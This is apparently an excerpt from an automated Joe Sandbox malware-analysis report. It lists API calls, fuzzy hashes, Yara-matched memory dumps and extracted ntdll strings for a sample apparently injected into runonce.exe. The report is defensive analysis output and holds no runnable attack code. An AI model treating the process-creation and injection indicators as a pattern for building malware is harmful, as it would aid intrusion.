                                          • Instruction ID: 2a52e3172768c6297389e4449261fefc69052e42404ed7307b9f0087790a0366
                                          • Opcode Fuzzy Hash: 804d6e634cd60fbf2a4739bc3b470ba7a390625aaa89991191acf5b01a31d8f2
                                          • Instruction Fuzzy Hash: FC3193B5A0060A9FDB00DFD9C8809EFB3B9BF88304B108959E545EB200D770EE01CBA0
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0310E847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize
                                          • String ID: @J7<
                                          • API String ID: 2538663250-2016760708
                                          • Opcode ID: 1d9eb1ca0badb408c119c793d16bd3e54afcbfdcb6a76acd58e629f81bacce2e
                                          • Instruction ID: 872b39275addc806aed5c4f5532cc630d4f3ff521a5b045251ffaf48619321b7
                                          • Opcode Fuzzy Hash: 1d9eb1ca0badb408c119c793d16bd3e54afcbfdcb6a76acd58e629f81bacce2e
                                          • Instruction Fuzzy Hash: C0316EB6A0060AAFDB00DFD9D8809EFB7B9BF88304B108559E555EB244D770EE05CBA0
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 031040C2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                                          • Instruction ID: 28fa1f958eeeb1e513a35b8e0426d692600b8287d0c7854b7b4a663b1ed2ef81
                                          • Opcode Fuzzy Hash: 3cbafcbb204b78bcf82abb4cf732ec46d42f0b04ed4e9d16c39dafc5bdaef8ad
                                          • Instruction Fuzzy Hash: E70152B9D4020DABDF10DBA0DD41FDDB7789F08218F0441A4EA08AB180F771EB54CB91
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,03107963,00000010,?,?,?,00000044,?,00000010,03107963,?,?,?), ref: 03118030
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 1b88c08b8088f465923f3ffb04a1ed128a6d89f32eee60c383e1f7b2e330f75a
                                          • Instruction ID: dc2678e67a23ba4e8031e7d2d3ccc4946c016f4c3c1a604ac869cefeb863046b
                                          • Opcode Fuzzy Hash: 1b88c08b8088f465923f3ffb04a1ed128a6d89f32eee60c383e1f7b2e330f75a
                                          • Instruction Fuzzy Hash: CA01C0B6215208BFCB44DE99DC80EDB77ADAFCC754F418208BA09E7241D630F8518BA4
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030F9425
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 28ea17ee74544b04e021be67550939db9f9d60b18f20beaad2f1db51a5c86f87
                                          • Instruction ID: 292ba8f2a1910cb1d8e8171677c20ea5d49210afb11aedf7e894f911e86cfd0a
                                          • Opcode Fuzzy Hash: 28ea17ee74544b04e021be67550939db9f9d60b18f20beaad2f1db51a5c86f87
                                          • Instruction Fuzzy Hash: 69F0ED333847043BE230A2AA9C02FDBB39CCB84AA0F140029F70CEB1C0DAA6B45042A4
                                          APIs
                                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03116C53
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Path$NameName_
                                          • String ID:
                                          • API String ID: 3514427675-0
                                          • Opcode ID: d2ed25a3e1f9f5ba5f7df68bf9765a6ba10a95af6fd925d5198e3924a6d81a9a
                                          • Instruction ID: bca099f3c4a2bce093d72ac1e8f3ec23943e3512897d5cf64f15d0606892d746
                                          • Opcode Fuzzy Hash: d2ed25a3e1f9f5ba5f7df68bf9765a6ba10a95af6fd925d5198e3924a6d81a9a
                                          • Instruction Fuzzy Hash: F9F039B9200609BBCA10EF59DC40EEB77ADEFC8760F408019FA08A7241DA30B9118BB4
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,10768B0C,00000007,00000000,00000004,00000000,03103931,000000F4,?,?,?,?,?), ref: 03117F7C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 175eaed759ef3ec92ca1b5799da392e4e14deb7affdea4c76855f511c58b7ac1
                                          • Instruction ID: 04d84bb948d9aef8290759abc593ae6c50a2d244fd2d78b6a679a361e7084e26
                                          • Opcode Fuzzy Hash: 175eaed759ef3ec92ca1b5799da392e4e14deb7affdea4c76855f511c58b7ac1
                                          • Instruction Fuzzy Hash: E8E03276200304BFE618EF58DC40EDB73ACEFC8660F408018FA08AB240DA61BA108AB4
                                          APIs
                                          • RtlAllocateHeap.NTDLL(03101279,?,03114A39,03101279,031142B7,03114A39,?,03101279,031142B7,00001000,?,?,031197D0), ref: 03117F2F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8808a138086d4d073c0b21786f2ebbbcccc174c20d674ad8e5d0e9dad5b340c7
                                          • Instruction ID: 3beb5f76ea9a1d73e7c187a3d7f5edc64511bd4ccfccf66471a82e964725921d
                                          • Opcode Fuzzy Hash: 8808a138086d4d073c0b21786f2ebbbcccc174c20d674ad8e5d0e9dad5b340c7
                                          • Instruction Fuzzy Hash: 87E065B6240304BFD614EE68DC40FEB73ACEFC9760F404419FA08AB240DA31B9208BB4
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 031079CC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ad740dcbe00d0110e469244627047f3d8634431cd86aa3d58fe8e3c17c29bbd8
                                          • Instruction ID: b67075d1009b05757056e328f84f60e308be13d0eb9c85e13569f2edb988819a
                                          • Opcode Fuzzy Hash: ad740dcbe00d0110e469244627047f3d8634431cd86aa3d58fe8e3c17c29bbd8
                                          • Instruction Fuzzy Hash: CDE04F7564030827EA24AAA89C45B6633588B4C674F2C4661B99C9F2C1E6B9F9528250
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,03101560,031169D7,031142B7,?), ref: 031077E3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: fc69b807da4b6940f8e3d7f693b34d15fbd200cb04ebb0917274bc6344d999d9
                                          • Instruction ID: 0d307e6f51e22c789a86c620513fe8d1559cb4470e19ca144f809f9586fbda2c
                                          • Opcode Fuzzy Hash: fc69b807da4b6940f8e3d7f693b34d15fbd200cb04ebb0917274bc6344d999d9
                                          • Instruction Fuzzy Hash: BDD05E76A443043BF610E6B59C06F56328C9B986A4F084464BA0CEB2C1EA66F1604665
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,03101560,031169D7,031142B7,?), ref: 031077E3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 6f6a2a1927d742beeca50d91abeb8d3d9a9bb2e91decc011d8aad44d937cd0ac
                                          • Instruction ID: 730c927f7ad50fa15d342ea375823be1b9636c3488ec0f0c9e984b28f2ca1491
                                          • Opcode Fuzzy Hash: 6f6a2a1927d742beeca50d91abeb8d3d9a9bb2e91decc011d8aad44d937cd0ac
                                          • Instruction Fuzzy Hash: C3E0C276A403003BF210E6B0CC46F49729CD788294F084464B50CFB2C1E666F21087A1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c1b98406b87105a47101aa32cd79ab4ea33c1534ed716e3102b8942b8ae62837
                                          • Instruction ID: 7752be9822d7bbd6547961d203c076d587163f14c54bfc615817bbfee01e7d04
                                          • Opcode Fuzzy Hash: c1b98406b87105a47101aa32cd79ab4ea33c1534ed716e3102b8942b8ae62837
                                          • Instruction Fuzzy Hash: D9B09B719015C5C5DA51D7605708B1F7D517BD1701F55C495D1460681E4738C091F175
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2532885e8bf1f19f57d41d0805e1096ec583b42cb2407dae07c65ad6ad90810a
                                          • Instruction ID: ae7f216e3cde0be617e9aea4c0c6f54595e36b80b6a88ad3508be1796f4ed994
                                          • Opcode Fuzzy Hash: 2532885e8bf1f19f57d41d0805e1096ec583b42cb2407dae07c65ad6ad90810a
                                          • Instruction Fuzzy Hash: B0B09B53F451181546144C6B38461B5E374C6CB465920666AE94EF32515511C41601DD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_30f0000_runonce.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 504ce6c3cf38dd34e167d8ff1e6e7928915dc5e7e03d5bba5dc7b3aa3e46e0c0
                                          • Instruction ID: 8d32bfae5b89461c0991022e084c8da6d3b796d19b7511df112ae34964cfb8d1
                                          • Opcode Fuzzy Hash: 504ce6c3cf38dd34e167d8ff1e6e7928915dc5e7e03d5bba5dc7b3aa3e46e0c0
                                          • Instruction Fuzzy Hash: 92C08C32E5410542CA308C0CA8022B1F370E78B233F4023B7DC28F71C08256A8728688
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050F4507
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 050F4530
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 050F4592
                                          • Execute=1, xrefs: 050F451E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 050F4460
                                          • ExecuteOptions, xrefs: 050F44AB
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 050F454D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: bb7425fb4e086b9eb120a3543e30383a5e76075d4e0f77d0f809bfbd0f88926e
                                          • Instruction ID: d772d56d8d36bf1e6cf42f870268c73d83ccb359de7d4ed844b192ae8ec7b401
                                          • Opcode Fuzzy Hash: bb7425fb4e086b9eb120a3543e30383a5e76075d4e0f77d0f809bfbd0f88926e
                                          • Instruction Fuzzy Hash: D351D531A042196AEF10EAA4FCD9FFE77A9EF54700F0405A9E506A7181EBB09B45CB94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.7374249964.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: true
                                          • Associated: 00000005.00000002.7374249964.0000000005179000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.7374249964.000000000517D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_5050000_runonce.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 28fdeb6cae73861aa2cf15db1aea2ab88c59eba0588489e034ade9f668730863
                                          • Instruction ID: cd34519abf5965a3fc3d2f2e12b542a73b08510f838bc8da1702221a3404cd12
                                          • Opcode Fuzzy Hash: 28fdeb6cae73861aa2cf15db1aea2ab88c59eba0588489e034ade9f668730863
                                          • Instruction Fuzzy Hash: C4814CB1D002699FDB35DB54DC45BEEB7B8BB08710F1445DAA90AB7290D7305E84CFA0